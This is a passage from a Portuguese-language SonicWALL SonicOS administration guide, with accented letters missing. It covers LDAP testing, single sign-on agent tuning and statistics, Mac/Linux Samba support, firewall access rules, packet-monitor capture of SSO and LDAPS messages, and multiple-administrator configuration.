relevantes para que as regras de poltica sejam adicionadas e permitir as solicitaes de
entrada do RADIUS de acordo. As opes so:
Zonas confiveis
Zona de WAN
Zonas pblicas
Zonas sem fio
Zona de VPN
Etapa 39 No campo Segredo compartilhado do RADIUS, insira um segredo compartilhado comum a
todos os firewalls remotos.
Etapa 40 No campo Grupos de usurios para usurios legados, defina os grupos de usurios que
correspondem aos privilgios legados dos usurios de VPN, usurios do cliente VPN,
usurios do L2TP e usurios com acesso Internet. Quando um usurio em um
determinado grupo de usurios for autenticado, os firewalls remotos sero informados de que
o usurio deve receber o privilgio relevante.

Nota Os privilgios de recursos de gerenciamento limitado e Filtros de desvio so retornados
com base na associao a grupos de usurios denominados Desvios de Filtragem de
Contedo e Administradores limitados elas no so configurveis.
Etapa 41 Selecione a guia Testar .
A pgina Testar permite que as configuraes do LDAP definidas sejam testadas, pela
tentativa de autenticao com credenciais especificadas de usurio e senha. Todas as
associaes a grupos de usurios e/ou endereo IP com moldura configurados no servidor do
LDAP/AD para o usurio sero exibidos.
Etapa 42 Nos campos Nome de usurio e Senha, insira um nome de login do LDAP vlido para o
servidor do LDAP configurado.
Etapa 43 Selecione Autenticao de senha ou CHAP (Challenge Handshake Authentication Protocol).
Nota O CHAP s funciona com um servidor que oferece suporte recuperao de senhas do
usurio com o uso do LDAP e, em alguns casos, requer que o servidor do LDAP seja
configurado para armazenar senhas de forma reversvel. Ele no pode ser utilizado com o
Active Directory.
Etapa 44 Clique em Testar. O status e as informaes retornadas do servidor do LDAP so exibidos nos
campos Status do teste, Mensagem do LDAP e Atributos de usurio retornados.

Ajustando configuraes avanadas do Login nico
Esta seo fornece informaes detalhadas para ajud-lo a ajustar as configuraes
avanadas do SSO em seu firewall. Consulte as sees a seguir:
Viso geral na pgina 1055
Sobre as Configuraes avanadas na pgina 1055
Exibindo estatsticas e dicas de ferramentas do SSO com o mouse sobre os itens na
pgina 1056
Usando as estatsticas de Login nico no TSR na pgina 1058
Examinando o agente na pgina 1059
Solues na pgina 1059
Viso geral
Quando um usurio primeiro tenta enviar o trfego por meio de um SonicWALL que esteja
utilizando o SSO, o dispositivo envia uma solicitao de identificao ao Agente SSO do
SonicWALL. O agente consulta o PC do usurio por meio da rede do Windows e retorna o
nome de usurio ao firewall. Se o nome de usurio corresponder a algum critrio definido nas
polticas, o usurio ser considerado como conectado pelo SonicWALL. Quando os usurios
forem conectados ao SonicWALL com o uso do SSO, o recurso do SSO tambm oferece a
deteco de logouts. Para detectar logouts, o dispositivo repetidamente controla o agente para
verificar se cada usurio ainda est conectado. Esta pesquisa, juntamente com as solicitaes
de identificao inicial, poderia resultar em um grande carregamento no aplicativo do Agente
SSO do SonicWALL e no PC no qual ele est sendo executado, especialmente quando um
grande nmero de usurios est se conectando.
O recurso do SSO do SonicWALL utiliza um mecanismo de limitao de taxa para impedir que
o dispositivo sobrecarregue o agente com essas solicitaes de usurio. Os dois clculos
automticos e uma configurao configurvel no dispositivo controlam o funcionamento dessa
limitao de taxa. O recurso do SSO do SonicWALL calcula automaticamente o nmero
mximo de solicitaes de usurio contidas em cada mensagem ao agente, que podem ser
processadas no perodo de pesquisa, com base nos tempos de resposta da pesquisa recente.
Alm disso, o tempo limite de uma solicitao de vrios usurios definido automaticamente
para ser longo o suficiente para reduzir a probabilidade de um tempo limite longo ocasional
durante a pesquisa. A definio configurvel controla o nmero de solicitaes que sero
enviadas ao agente de uma s vez e pode ser ajustada para otimizar o desempenho do SSO
e evitar possveis problemas. Esta seo fornece um guia para escolher configuraes
adequadas.
Os possveis problemas resultantes da sobrecarga do agente podem ser reduzidos com a
execuo do agente em um PC dedicado de alto desempenho, e possivelmente tambm com
o uso de vrios agentes em PCs separados, caso em que a carga ser compartilhada entre
eles. A ltima opo tambm oferece redundncia, no caso de falha em um dos PCs do agente.
O agente deve ser executado em um PC com o Windows Server (algumas estaes de trabalho
mais antigas poderiam ser utilizadas, mas as alteraes em verses posteriores do Windows
2000/XP/Vista para estaes de trabalho e nos service packs para as verses mais antigas
incluam um recurso de limitao da taxa da conexo TCP que interfere com a operao do
agente SSO).
Sobre as Configuraes avanadas
A configurao Mximo de solicitaes a serem enviadas por vez est disponvel na guia
Avanadas da configurao do Agente SSO.

Esta configurao controla o nmero mximo de solicitaes que podem ser enviadas do
dispositivo para o agente ao mesmo tempo. O agente processa vrias solicitaes ao mesmo
tempo, gerando um segmento separado no PC para lidar com cada uma delas. Enviar muitas
solicitaes ao mesmo tempo pode sobrecarregar o PC no qual o agente est sendo
executado. Se o nmero de solicitaes que sero enviadas ultrapassar o nmero mximo,
algumas sero colocadas em uma fila interna do buffer de anel (consulte Usando as
estatsticas de Login nico no TSR na pgina 1058 e Exibindo estatsticas e dicas de
ferramentas do SSO com o mouse sobre os itens na pgina 1056). As solicitaes que
aguardam o buffer de anel por muito tempo podem levar a tempos de resposta lentos na
autenticao do SSO.
Essa configurao funciona em conjunto com o nmero de solicitaes de usurio calculadas
automaticamente por mensagem para o agente, durante a pesquisa para verificar o status de
login do usurio. O nmero de solicitaes de usurio por mensagem calculado com base no
tempo de resposta da pesquisa recente. O SonicOS ajusta esse nmero o mais alto possvel
para minimizar o nmero de mensagens que precisam ser enviadas, o que reduz a carga sobre
o agente e ajuda a reduzir o trfego de rede entre o dispositivo e o agente. No entanto, o
nmero mantido baixo o suficiente para permitir que o agente processe todas as solicitaes
de usurio na mensagem dentro do perodo de pesquisa. Isso evita possveis problemas, como
tempos limite e falhas para detectar rapidamente usurios desconectados.
Exibindo estatsticas e dicas de ferramentas do SSO com o mouse sobre os itens
A pgina Configurao do SSO fornece estatsticas sobre cada agente, alm de dicas de
ferramentas para muitos campos, exibidas com o mouse sobre os itens. Na guia
Configuraes, um cone de estilo LED verde ao lado de um agente indica que o agente est
ativo e em execuo. Um cone de LED vermelho indica que o agente est inativo.
Para exibir as estatsticas para um determinado agente, passe o mouse sobre o cone de
estatsticas , localizado direita do agente SSO. Isso tambm funciona para TSAs
individuais na guia Servios de terminal.

Para exibir as estatsticas de todas as atividades do SSO no dispositivo, passe o mouse sobre
o cone de estatsticas localizado na parte inferior da tabela, na mesma linha que o boto
Adicionar.
Para fechar a exibio das estatsticas, clique em Fechar.

Para limpar todos os valores exibidos, clique em Clique para redefinir.
Para visualizar as dicas de ferramentas disponveis para muitos campos nas telas de
configurao do SSO, passe o mouse sobre o cone triangular localizado direita do campo.
A dica de ferramenta ser exibida at que o mouse seja movido para fora dessa rea.

Usando as estatsticas de Login nico no TSR
Um conjunto avanado de estatsticas de desempenho e erros da o SSO includo no relatrio

de resoluo de problemas (TSR). Eles podem ser utilizados para medir o desempenho do
SSO em sua instalao. Faa o download do TSR na pgina Sistema > Diagnstico e procure
o ttulo Estatsticas de operaes do SSO. Seguem abaixo os contadores a serem
especificamente examinados:
1. Em Estatsticas do buffer de anel do SSO, examine Estouros do buffer de anel e
Tempo mximo no anel. Se este ltimo se aproximar ou ultrapassar a taxa de pesquisa,
ou se algum estouro do buffer de anel for mostrado, isso significa que as solicitaes no
esto sendo enviadas para o agente de forma suficientemente rpida. Alm disso, se a
opo Solicitaes atuais aguardando no anel estiver aumentando de forma constante,
isso indicaria a mesma situao. Isso significa que o valor Mximo de solicitaes a
serem enviadas por vez deve ser aumentado para um envio mais rpido das solicitaes.
No entanto, isso aumentar a carga sobre o agente, e se o agente no for capaz de
manipular a carga adicional, isso resultar em problemas, caso em que pode ser
necessrio considerar transferir o agente para um PC mais eficiente ou adicionar agentes
adicionais.
2. Em Estatsticas de operaes do SSO, examine Falha nas tentativas da ID de usurio
com o tempo limite expirado e Falha nas tentativas da ID de usurio com outros
erros. Elas devem ser zero ou prximas a zero as falhas significativas mostradas aqui
indicam um problema com o agente, provavelmente porque ele no capaz de
acompanhar o nmero de tentativas de autenticaes de usurios.
3. Tambm em Estatsticas de operaes do SSO, examine Total de usurios
pesquisados na pesquisa peridica, Falha na pesquisa com usurios com tempos
limite expirados e Falha na pesquisa com usurios com outros erros. Observar alguns
tempos limite e erros aqui aceitvel e provavelmente so esperados; as falhas ocasionais
na pesquisa no causaro problemas. No entanto, a taxa de erro deve ser baixa (uma taxa
de erro de aproximadamente 0,1% ou menos deve ser aceitvel). Alm disso, uma alta taxa
de falhas aqui indica um problema com o agente, conforme mostrado acima.
4. Em Estatsticas do agente SSO, examine o Mdia do tempo de solicitao da ID de
usurio e Mdia do tempo de resposta da pesquisa por usurio. Esses campos devem
estar na regio de alguns segundos ou menos algo mais indica possveis problemas na
rede. Observe, no entanto, que erros causados por tentativas de autenticar o trfego de
PCs sem o Windows por meio do SSO (o que pode levar muito tempo) podem distorcer o
valor Mdia do tempo de solicitao da ID de usurio; portanto, se ele for alto, mas a
Mdia do tempo de resposta da pesquisa por usurio parecer correto, isso indicaria que
o agente est provavelmente enfrentando um grande nmero de erros, provavelmente
devido tentativa de autenticar dispositivos sem o Windows consulte abaixo, #6.
5. Se estiver usando vrios agentes, examine tambm Estatsticas do Agente SSO as taxas
de erro e o tempo limite relatados para os agentes diferentes e tambm seus tempos de
resposta. Diferenas significativas entre os agentes poderia indicar um problema
especfico em um agente, que poderia ser solucionado pela atualizao ou alterao das
configuraes para esse agente especfico.
6. O trfego de outros dispositivos que no sejam PCs pode acionar tentativas de
identificao do SSO e pode causar relatrios de erros e/ou tempos limite nessas
estatsticas. Isso pode ser evitado pela configurao de um grupo de objetos de endereo
com os endereos IP desses dispositivos, e pela realizao de uma ou das opes a
seguir:
Se estiver usando a Filtragem de contedo, selecione esse objeto de endereo com a
configurao Ignorar o processo de Login nico para o trfego de, na guia
Imposio da configurao do SSO.

Se as regras de acesso estiverem definidas para permitir somente usurios
autenticados, defina regras separadas para esse objeto de endereo com Usurios
permitidos definido como Todos.
Para identificar os endereos IP em questo, examine o TSR e pesquise por endereos
IP retidos das tentativas do SSO. Isto lista as falhas no SSO no perodo anterior definido
pela configurao Tempo de espera aps falha.
Nota Se qualquer um dos endereos IP listados pertencer a PCs com Mac/Linux,

consulte Acomodando usurios do Mac e Linux na pgina 1060.
Para limitar a taxa de erros devido a isso, tambm possvel estender a configurao
Tempo de espera aps falha na guia Usurios.
Examinando o agente
Se as estatsticas acima indicarem um possvel problema com o agente, a prxima etapa

recomendada seria executar o Gerenciador de tarefas do Windows no PC no qual o agente
est sendo executado e examinar o uso da CPU na guia Desempenho, alm do uso da CPU
pelo processo CIAService.exe na guia Processos . Se este ltimo campo estiver usando
uma grande porcentagem do tempo da CPU e o uso da CPU apresentar picos prximos a
100%, esta uma indicao de que o agente est sendo sobrecarregado. Para tentar reduzir
o carregamento, voc pode diminuir a configurao Mximo de solicitaes a serem
enviadas por vez; consulte Usando as estatsticas de Login nico no TSR acima, #1.
Solues
Se no possvel equilibrar as configuraes para evitar a sobrecarga do PC do agente,

enquanto ainda for capaz de enviar solicitaes para o agente de forma suficientemente
rpida, uma das aes a seguir dever ser tomada:
Considere a reduo da taxa de pesquisa configurada na guia Usurios, aumentando o
tempo de pesquisa. Isso reduzir a carga sobre o agente, custa da deteco menos
rpida dos logouts. Observe que em um ambiente com PCs compartilhados,
provavelmente melhor manter o intervalo de pesquisa o mais curto possvel para evitar
problemas que possam resultar da no deteco de logouts quando usurios diferentes
utilizam o mesmo PC, como o trfego inicial do segundo usurio de um PC possivelmente
sendo conectado, conforme enviado pelo usurio anterior.
Transfira o agente para um PC dedicado com maior desempenho.
Configure um agente ou mais agentes adicionais.
Configurando as regras de acesso do firewall

Habilitar o SSO do SonicWALL afeta as polticas da pgina Firewall > Regras de acesso da
interface de gerenciamento do SonicOS. As regras definidas em Firewall > Regras de acesso
so comparadas com as associaes a grupos de usurios retornados de uma consulta do
LDAP do SSO e so aplicadas automaticamente.
Regras geradas automaticamente para o SSO do SonicWALL na pgina 1060
Acomodando usurios do Mac e Linux na pgina 1060
Permitindo pings do ICMP a partir de um servidor do terminal na pgina 1062
Sobre as regras de acesso do firewall na pgina 1062

Regras geradas automaticamente para o SSO do SonicWALL
Quando um agente SSO ou TSA do SonicWALL configurado na interface de gerenciamento

do SonicOS, uma regra de acesso do Firewall e uma poltica NAT correspondente sero
criadas para permitir respostas do agente na LAN. Essas regras utilizam um objeto de grupo
de endereo dos Agentes SSO do SonicWALL ou Agentes de servios de terminal do
SonicWALL, que tem um objeto de endereo de membro para cada agente configurado. Os
objetos de endereo do membro so automaticamente adicionados e removidos do objeto do
grupo, conforme os agentes forem adicionados ou excludos. Os objetos de endereo do
membro tambm so atualizados automaticamente conforme o endereo IP de um agente
alterado, incluindo os casos em que um endereo IP resolvido por meio do DNS (onde um
agente determinado pelo nome DNS).
Se os agentes SSO ou TSAs do SonicWALL estiverem configurados em diferentes zonas, a
regra de acesso do Firewall e a poltica NAT sero adicionadas a cada zona aplicvel. O
mesmo grupo de endereos Agentes SSO do SonicWALL ou Agentes de servios de terminal
do SonicWALL utilizado em cada zona.
Nota No habilite os Servios de convidados na mesma zona em que o SSO do SonicWALL est
sendo utilizado. Ativar os Servios de convidados desativar o SSO nessa zona, fazendo
com que os usurios que foram autenticados por meio do SSO percam o acesso. Crie uma
zona separada para os Servios de convidados.
Acomodando usurios do Mac e Linux
Os sistemas com Linux e Mac no oferecem suporte s solicitaes de rede do Windows que
so utilizadas pelo agente SSO do SonicWALL, mas eles podem usar o Samba 3.5 ou uma
verso mais recente para funcionar com o SSO do SonicWALL.
Usando o SSO no Mac e Linux com Samba

Para os usurios do Windows, o SSO do SonicWALL utilizado por um firewall para autenticar
automaticamente os usurios em um domnio do Windows. Ela permite que os usurios
obtenham acesso por meio do dispositivo com a conformidade correta de filtragem e poltica,
sem a necessidade de identificao por meio de qualquer processo de login adicionais aps o
login de domnio do Windows.
O Samba um pacote de software utilizado por mquinas com Linux/Unix ou Mac para
fornecer aos usurios o acesso a recursos em um domnio do Windows (por meio do utilitrio
smbclient do Samba) e/ou para fornecer aos usurios de domnio do Windows o acesso a
recursos na mquina com Linux ou Mac (por meio de um servidor Samba).
Um usurio que esteja trabalhando em um PC com Linux ou Mac com o Samba em um domnio
do Windows pode ser identificado pelo SSO do SonicWALL; contudo, isso requer a
configurao correta da mquina com Linux/Mac, do Agente SSO e provavelmente algumas
reconfiguraes do dispositivo. Por exemplo, necessria a configurao a seguir:
Para usar o SSO do SonicWALL com os usurios do Linux/Mac, o Agente SSO do
SonicWALL deve ser configurado para usar o NetAPI em vez do WMI para obter as
informaes de login do usurio de sua mquina.
Para que o Samba seja capaz de receber e responder s solicitaes do Agente SSO do
SonicWALL, ele deve ser configurado como um membro do domnio e o servidor do Samba
deve estar sendo executado e configurado corretamente para usar a autenticao de
domnio.
Esses e outros detalhes de configurao so descritos na nota tcnica a seguir:
http://www.sonicwall.com/downloads/Using_SSO_with_Samba_TechNote.pdf
O SSO do SonicWALL suportado pelo Samba 3.5 ou uma verso mais recente.

Nota Se vrios usurios efetuarem login em um PC com Linux, o acesso ao trfego desse
computador concedido com base no login mais recente.
Usando o SSO no Mac e Linux sem Samba

Sem o Samba, os usurios do Linux e Mac podem continuar a obter acesso, mas ser
necessrio efetuar login no firewall para obt-lo. Esta situao poder causar os seguintes
problemas:
O trfego dos sistemas com Mac ou Linux pode continuar acionando as tentativas de
identificao do SSO, a menos que o usurio se conecte. Isso poderia causar uma possvel
sobrecarga no desempenho do sistema do SSO se houver um grande nmero desses
sistemas, embora o efeito poderia ser reduzido em parte pelo tempo limite de espera aps
falha.
Se as polticas de Filtragem de Contedo (CFS) por usurio forem utilizadas sem as regras
da poltica com a autenticao no nvel de usurio, a poltica do CFS padro ser aplicada
aos usurios dos sistemas com Linux e Mac, a menos que eles efetuarem login
manualmente primeiro.
Se as regras da poltica estiverem definidas para exigir a autenticao no nvel de usurio,
as conexes de navegador da web de usurios dos sistemas com Linux e Mac sero
redirecionadas para a pgina de login aps a falha do SSO, mas a falha poder iniciar um
tempo limite que poderia causar um atraso para o usurio.
Para evitar esses problemas, a caixa de seleo No invocar Login nico para autenticar
usurios est disponvel ao configurar as regras de acesso, clicando em Adicionar na pgina
Firewall > Regras de acesso (com Exibir estilo definido como Todas as regras). Esta caixa
de seleo estar visvel somente quando o SSO do SonicWALL estiver habilitado e quando o
campo Usurios permitidos na pgina Adicionar regra no estiver definido como Todos. Se
esta caixa de seleo estiver marcada, o SSO no realizar uma tentativa de trfego que
corresponda regra e as conexes de HTTP no autenticadas que corresponderem ela

sero direcionadas diretamente para a pgina de login. Geralmente, o campo Origem seria
definido como um objeto de endereo que contm os endereos IP dos sistemas com Mac e
Linux.
No caso do CFS, uma regra com esta caixa de seleo habilitada pode ser adicionada na
frente do CFS, para que as sesses de HTTP dos sistemas com Linux e Mac sejam
redirecionadas automaticamente para o login, evitando a necessidade de login manual por
esses usurios.
Nota No selecione a opo No invocar Login nico para autenticar usurios para uso com
dispositivos que tm permisso para ignorar por completo o processo de autenticao do
usurio. Quaisquer dispositivos que possam ser afetados por uma regra de acesso quando
essa opo ativada devem ser capazes de efetuar login manualmente. Uma regra de
acesso separada deve ser adicionada para esses dispositivos, com Usurios permitidos
definido como Todos.
Permitindo pings do ICMP a partir de um servidor do terminal
No Windows, os pings do ICMP de sada de usurios no Servidor do Terminal no so enviados

por meio de um soquete e, portanto, no so exibidos pelo TSA; assim, o dispositivo no
receber nenhuma notificao deles. Portanto, se as regras do firewall estiverem usando a
autenticao no nvel do usurio e os pings tiverem permisso de serem transmitidos, ser
necessrio criar regras de acesso separadas para permiti-los na opo Todos.
Sobre as regras de acesso do firewall
As regras de acesso do firewall fornecem ao administrador a capacidade de controlar o acesso

do usurio. As regras definidas em Firewall > Regras de acesso so comparadas com as
associaes a grupos de usurios retornados de uma consulta do LDAP do SSO e so
aplicadas automaticamente. As regras de acesso so ferramentas de gerenciamento de rede
que permitem que voc defina polticas de acesso de entrada e sada, configure a autenticao

do usurio e habilite o gerenciamento remoto do firewall. A pgina Firewall > Regras de
acesso do SonicOS disponibiliza uma interface classificvel de gerenciamento de regras de
acesso.
Nota As regras de polticas mais especficas devem receber uma prioridade mais alta do que as
regras de polticas gerais. A hierarquia de especificidade geral origem, destino, servio.
Os elementos de identificao do usurio como, por exemplo, nome de usurio e
permisses de grupo correspondentes, no so includos na definio da especificidade de
uma regra da poltica.
Por padro, a inspeo de pacotes com monitorao de estado do firewall permite total
comunicao a partir da LAN para a Internet e bloqueia todo o trfego para a LAN a partir da
Internet.
possvel definir mais regras de acesso rede para aumentar ou substituir regras de acesso
padro. Por exemplo, possvel criar regras de acesso que bloqueiem determinados tipos de
trfego, como IRC da LAN para a WAN, ou permitir determinados tipos de trfego, como a
sincronizao do banco de dados do Lotus Notes, de hosts especficos na Internet para hosts
especficos na LAN ou restringir o uso de determinados protocolos, como Telnet, a usurios
autorizados na LAN.
Cuidado A capacidade de definir as regras de acesso rede uma ferramenta muito eficiente. O uso
das regras de acesso personalizadas pode desabilitar a proteo do firewall ou bloquear
todo o acesso Internet. Tenha cuidado ao criar ou excluir regras de acesso rede.
Para obter informaes detalhadas sobre as regras de acesso, consulte Firewall > Regras de
acesso na pgina 555.
Gerenciando o SonicOS com o login de HTTP a partir de um servidor do terminal

Geralmente, o firewall concede acesso por meio de polticas com base nas credenciais de
autenticao fornecidas por meio do login de HTTP para um usurio em um endereo IP. Para
usurios em um servidor do terminal, esse mtodo de autenticao de um usurio por
endereo IP no possvel. No entanto, o login de HTTP ainda permitido de um servidor do
terminal somente para fins de administrao do dispositivo e est sujeito s seguintes
limitaes e requisitos:
O acesso Internet do servidor do terminal controlado do TSA e o login de HTTP no
substitui que um usurio em um servidor do terminal no obtenha acesso por meio do
dispositivo com base nas credenciais fornecidas por meio do login de HTTP.
O login de HTTP de um servidor do terminal permitido somente para a conta do admin
interno e outras contas de usurio com privilgios de administrador. Uma tentativa de
efetuar login com uma conta no administrativa resultar em uma falha com o erro No
permitido neste local.
No login de HTTP bem-sucedido, um usurio administrativo levado diretamente para a
interface de gerenciamento. A pgina curta Status de login do usurio no exibida.
A conta do usurio administrador utilizada para o login de HTTP do servidor do terminal
no precisa ser a mesma conta de usurio que foi utilizada para o login no servidor do
terminal. Ela mostrada no dispositivo como uma sesso de login totalmente separada.
Somente um usurio por vez pode gerenciar o dispositivo a partir de um determinado
servidor do terminal. Se dois usurios tentarem fazer isso simultaneamente, o usurio
conectado mais recentemente tem precedncia e o outro usurio visualizar o erro Este
no foi o navegador mais recentemente utilizado para o login.

Em uma falha para identificar um usurio devido a problemas de comunicao com o TSA,
uma sesso do navegador com HTTP no redirecionada para a pgina de login da web
(como ocorre em uma falha no caso do SSO). Em vez disso, ela direcionada para uma
nova pgina com a mensagem O destino que voc estava tentando acessar est
temporariamente indisponvel devido a problemas de rede.
Exibindo e gerenciando sesses de usurio no SSO

Esta seo fornece informaes para ajud-lo a gerenciar o SSO em seu firewall. Consulte as
sees a seguir:
Efetuando logout de usurios no SSO na pgina 1064
Definindo configuraes adicionais de usurios do SSO na pgina 1064
Exibindo as mensagens do LDAP e SSO com o Monitor de pacotes na pgina 1065
Capturando mensagens do SSO na pgina 1065
Capturando mensagens do LDAP sobre TLS na pgina 1066
Efetuando logout de usurios no SSO
A pgina Usurios > Status exibe as Sesses de usurio ativas no firewall. A tabela
enumera o Nome do usurio, Endereo IP, Tempo de sesso, Tempo restante, Inatividade
restante, Configuraes e Logout. Para usurios autenticados com o Agente SSO do
SonicWALL, a mensagem Aut. pelo Agente SSO ser exibida. Para efetuar logout de um
usurio, clique no cone de excluso , localizado ao lado da entrada do usurio.
Nota As alteraes nas configuraes de um usurio, configurado em Usurios >

Configuraes, no sero aplicadas durante a sesso atual desse usurio; ser
necessrio efetuar o logout do usurio manualmente para que as alteraes tenham efeito.
O usurio ser conectado novamente de forma transparente com as alteraes aplicadas.
Definindo configuraes adicionais de usurios do SSO
A pgina Usurios > Configuraes fornece ao administrador opes para as configuraes

da sesso de usurio, configuraes gerais de usurio, configuraes de poltica de uso
aceitvel, alm das configuraes de SSO e outras de login do usurio.
As configuraes Habilitar limite de sesso de login e a Limite da sesso de login
(minutos)correspondente em Configuraes da sesso de usurio aplicam-se aos usurios
conectados com o SSO. Os usurios do SSO sero desconectados de acordo com as
configuraes de limite da sesso, mas sero automtica e imperceptivelmente conectados
novamente quando eles enviarem mais trfego.
Nota No defina um intervalo de limite da sesso de login muito baixo. Isso poderia causar
problemas de desempenho, especialmente para implementaes com muitos usurios.
As alteraes aplicadas na pgina Usurios > Configuraes durante uma sesso ativa do
SSO no sero aplicadas durante a sesso.
Dica necessrio efetuar o logout do usurio para que as alteraes tenham efeito. O usurio
ser conectado novamente imediata e automaticamente com as alteraes aplicadas.

Exibindo as mensagens do LDAP e SSO com o Monitor de pacotes
O recurso Monitor de pacotes disponvel em Sistema > Monitor de pacotes fornece duas
caixas de seleo para habilitar a captura de mensagens decodificadas do e para o Agente
SSO e de mensagens decodificadas do LDAP sobre TLS (LDAPS).
Capturando mensagens do SSO
Para capturar mensagens decodificadas do ou para o agente de autenticao do SSO, realize

Etapa 1 Clique no boto Configurao, na pgina Sistema > Monitor de pacotes

Etapa 2 Clique na guia Filtro de monitor avanado
Etapa 3 Selecione a caixa de seleo Monitorar pacotes intermedirios.
Etapa 4 Selecione a caixa de seleo Monitorar mensagens intermedirias decodificadas do
agente de Login nico.

Os pacotes sero marcados com (sso) no campo da interface de entrada/sada. Eles tero
cabealhos Ethernet, TCP e IP fictcios, para que alguns desses valores no sejam
corrigidos.
Isso permitir alimentar os pacotes decodificados do SSO ao monitor de pacotes, mas
nenhum filtro do monitor ainda ser aplicado a eles.

As mensagens do SSO capturadas so exibidas totalmente decodificadas na tela Sistema
> Monitor de pacotes.
Capturando mensagens do LDAP sobre TLS
Para capturar pacotes decodificados do LDAP sobre TLS (LDAPS), realize as seguintes
etapas:
Etapa 1 Clique no boto Configurao, na pgina Sistema > Monitor de pacotes

Etapa 2 Clique na guia Filtro de monitor avanado
Etapa 3 Selecione a caixa de seleo Monitorar pacotes intermedirios.
Etapa 4 Selecione a caixa de seleo Monitorar pacotes intermedirios decodificados do LDAP
sobre TLS.

Os pacotes sero marcados com (ldp) no campo da interface de entrada/sada. Eles tero
cabealhos Ethernet, TCP e IP fictcios, para que alguns desses valores no sejam corrigidos.
A porta do servidor do LDAP ser definida para 389, para que um programa externo de anlise
da captura (como o Wireshark) saiba decodificar esses pacotes como o LDAP. As senhas em
solicitaes de ligao LDAP capturadas sero confusas. As mensagens do LDAP no so
decodificadas na exibio do Monitor de pacotes, mas a captura pode ser exportada e exibida
no WireShark para exibi-las decodificadas.
Isso permitir alimentar os pacotes decodificados da LDAPS ao monitor de pacotes, mas
nenhum filtro do monitor ainda ser aplicado a eles.
Nota A captura do LDAPS s funciona para conexes do cliente do LDAP do firewall e no exibir
conexes do LDAP sobre TLS de um cliente do LDAP externo que passem por meio do
dispositivo.

Configurando o Suporte para mltiplos administradores

Configurando perfis de usurio administrador adicionais na pgina 1069
Configurando os administradores localmente ao usar o RADIUS ou LDAP na pgina 1069
Apropriando administradores na pgina 1070
Ativando o modo de configurao na pgina 1071
Verificando a configurao do Suporte para mltiplos administradores na pgina 1072
Exibindo mensagens de log relacionadas a mltiplos administradores na pgina 1073

Configurando perfis de usurio administrador adicionais
Para configurar perfis de usurio administrador adicionais, realize as seguintes etapas:
Etapa 1 Ao efetuar login como admin, navegue at a pgina Usurios > Usurios locais.
Etapa 2 Clique no boto Adicionar usurio.
Etapa 3 Insira um Nome e Senha para o usurio.
Etapa 4 Clique na guia Associaes a grupos.
Etapa 5 Selecione o grupo adequado para conceder ao usurio privilgios de Administrador:

Administradores limitados O usurio possui privilgios de configurao do
administrador limitados.
Administradores do SonicWALL O usurio possui privilgios de configurao do
administrador completos.
Administradores somente leitura do SonicWALL O usurio pode visualizar a interface
de gerenciamento completa, mas no pode fazer alteraes na configurao.
Etapa 6 Clique no boto de seta para a direita e clique em OK.
Etapa 7 Para configurar o recurso de mltiplos administradores, de forma que os administradores
sejam desconectados quando forem apropriados, navegue at a pgina Sistema >
Administrao.
Etapa 8 Selecione o boto de opo Logout para a opo Em apropriao por outro administrador
e clique em Aceitar.
Configurando os administradores localmente ao usar o RADIUS ou LDAP

Ao usar a autenticao do RADIUS ou LDAP, se voc deseja garantir que alguns ou todos os
usurios administrativos sempre sejam capazes de gerenciar o dispositivo, mesmo se o
servidor do RADIUS ou LDAP no estiver acessvel, possvel usar a opo RADIUS +
Usurios locais ou LDAP + Usurios locais para configurar as contas localmente para esses
usurios especficos.

Para os usurios autenticados pelo RADIUS ou LDAP, crie grupos de usurio denominados
Administradores do SonicWALL e/ou Administradores somente leitura do SonicWALL no
servidor do RADIUS ou LDAP (ou seu back-end) e atribua os usurios relevantes a esses
grupos. Observe que, no caso do RADIUS, voc provavelmente precisar de uma configurao
especial do servidor do RADIUS para retornar as informaes de grupo do usurio consulte
a documentao do RADIUS do SonicWALL para obter mais detalhes.
Ao usar a autenticao do RADIUS ou LDAP, se voc deseja manter a configurao local dos
usurios administrativos ao dispositivo, ao mesmo tempo que deseja autenticar esses usurios
pelo RADIUS/LDAP, realize estas etapas:

Etapa 2 Selecione o mtodo de autenticao RADIUS + Usurios locais ou LDAP + Usurios locais.
Etapa 4 Para o RADIUS, clique na guia Usurios do RADIUS e selecione o boto de opo Somente
configurao local e verifique se a caixa de seleo As associaes podem ser definidas
localmente pela duplicao de nomes de usurio do RADIUS est marcada.
Etapa 5 Para o LDAP, clique na guia Usurios do LDAP e selecione a caixa de seleo A associao
a grupos de usurios pode ser definida localmente pela duplicao de nomes de usurio
do LDAP.
Etapa 6 Em seguida, crie contas de usurios locais com os nomes de usurio dos usurios
administradores (observe que nenhuma senha precisa ser definida aqui) e adicione-os aos
grupos de usurios administradores relevantes.
Apropriando administradores
Quando um administrador tentar efetuar login enquanto outro administrador est conectado, a
seguinte mensagem exibida. A mensagem exibe o nome de usurio do administrador atual,
endereo IP, nmero de telefone (se for possvel recuper-lo do LDAP), e se o administrador
est conectado com GUI ou CLI.
Esta janela oferece trs opes:

Continuar Apropria o administrador atual. O administrador atual descartado para o
modo de no configurao e voc obter acesso de administrador completo.
No configurao Voc ser conectado ao dispositivo no modo de no configurao. A
sesso do administrador atual no ser afetada.
Cancelar Retorna tela de autenticao.

Ativando o modo de configurao
Ao efetuar login como um usurio com direitos de administrador (que no seja o usurio
admin), a janela pop-up Status de login do usurio exibida.
Para acessar a interface de usurio do SonicWALL, clique no boto Gerenciar. Voc ser
solicitado a inserir sua senha novamente. Esta uma medida de segurana para proteger
contra o acesso no autorizado quando os administradores estiverem distantes de seus
computadores e no efetuarem logout da sesso.
Desabilitando a janela pop-up de Status de login do usurio
possvel desabilitar a janela pop-up Status de login do usurio se preferir permitir que
determinados usurios efetuem login somente com o propsito de gerenciamento do
dispositivo, e no para o acesso privilegiado por meio do dispositivo. Para desabilitar a janela
pop-up, selecione a caixa de seleo Os membros acessam diretamente a UI de
gerenciamento no login da web ao adicionar ou editar o grupo local.
Se voc deseja que algumas contas de usurio sejam somente administrativas, enquanto
outros usurios precisam efetuar login para o acesso privilegiado por meio do dispositivo, mas
tambm com a capacidade de administr-lo (ou seja, alguns acessam a interface de
gerenciamento no login, enquanto outros visualizam a janela pop-up Status de login do
usurio com um boto Gerenciar), isso pode ser realizado da seguinte maneira:
Etapa 1 Crie um grupo local com a caixa de seleo Os membros acessam diretamente a UI de
gerenciamento no login da web marcada.
Etapa 2 Adicione o grupo ao grupo administrativo relevante, mas no selecione esta caixa de seleo
no grupo administrativo.
Etapa 3 Adicione as contas de usurio que devero ser somente administrativas ao novo grupo de
usurios. A janela pop-up Status de login do usurio ser desabilitada para esses usurios.
Etapa 4 Adicione as contas de usurio que devero ter acesso administrativo e privilegiado diretamente
